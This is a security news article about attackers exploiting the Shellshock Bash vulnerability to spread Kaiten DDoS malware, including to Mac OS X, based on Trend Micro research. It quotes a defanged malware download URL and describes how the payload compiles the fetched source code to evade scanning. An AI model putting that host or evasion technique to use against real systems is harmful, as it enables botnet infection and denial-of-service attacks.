Hackers are exploiting the Shellshock bug to infect numerous systems, including Apple Mac OS X, with a distributed denial-of-service (DDoS) malware known as Kaiten.
Security researchers from Trend Micro reported uncovering the campaign in a blog post, warning that it has the potential to inflict devastating DDoS attacks.
“We found that one of the payloads of Bash vulnerabilities, which we detect as TROJ_BASHKAI.SM, downloaded the source code of Kaiten malware, which is used to carry out denial-of-service attacks,” read the post.
“Kaiten is old IRC-controlled DDoS malware and, as such, there is a possibility that the attackers employed Shellshock to revive its old activities like DDoS attacks to target organisations.”
Discovered earlier in September, Shellshock is a critical vulnerability in the Bash code used by Unix and Unix-like systems.
Trend Micro listed the new attack’s ability to infect Mac OS systems as being particularly troubling, highlighting it as evidence that hackers are using Shellshock to expand the victim-base of their campaigns.
“Typically, systems infected with Shellshock payloads become a part of their botnet, and therefore can be used to launch DDoS attacks. In addition, the emergence of a downloaded file that targets Mac OS clearly shows that attackers are broadening their target platform,” the security firm said.
Trend Micro added that the threat is doubly dangerous as Apple had mistakenly told its users that most should be safe by default.
“Users who configured to enable the Advanced Unix Services are still affected by this vulnerability,” read the post.
“The Advanced Unix services enables remote access via Secure Shell which offers ease of access to system or network administrators in managing their servers. This service is most likely enabled for machines used as servers such as web servers, which are the common targets Shellshock attacks.”
Apple released security patches to plug Shellshock for its OS X Maverick, Lion and Mountain Lion operating systems in September.
The Trend Micro researchers added that IT managers should be on guard for the attack as it has advanced detection dodging powers.
“When it connects to http://www[dot]computer-services[dot]name/b[dot]c, it downloads the Kaiten source code, which is then compiled using the common gcc compiler. This means that once connected to the URL, it won’t immediately download an executable file,” explained the researchers.
“This routine could also be viewed as an evasion technique as some network security systems filter out non-executable files from scanning, due to network performance concerns. Systems configured this way may skip the scanning of the source code because it’s basically a text file.”
The Kaiten attack is one of many recently discovered campaigns using Shellshock. Researchers from FireEye caught hackers exploiting the Shellshock Bash vulnerability to infect enterprise Network Attached Storage systems with malware at the end of September.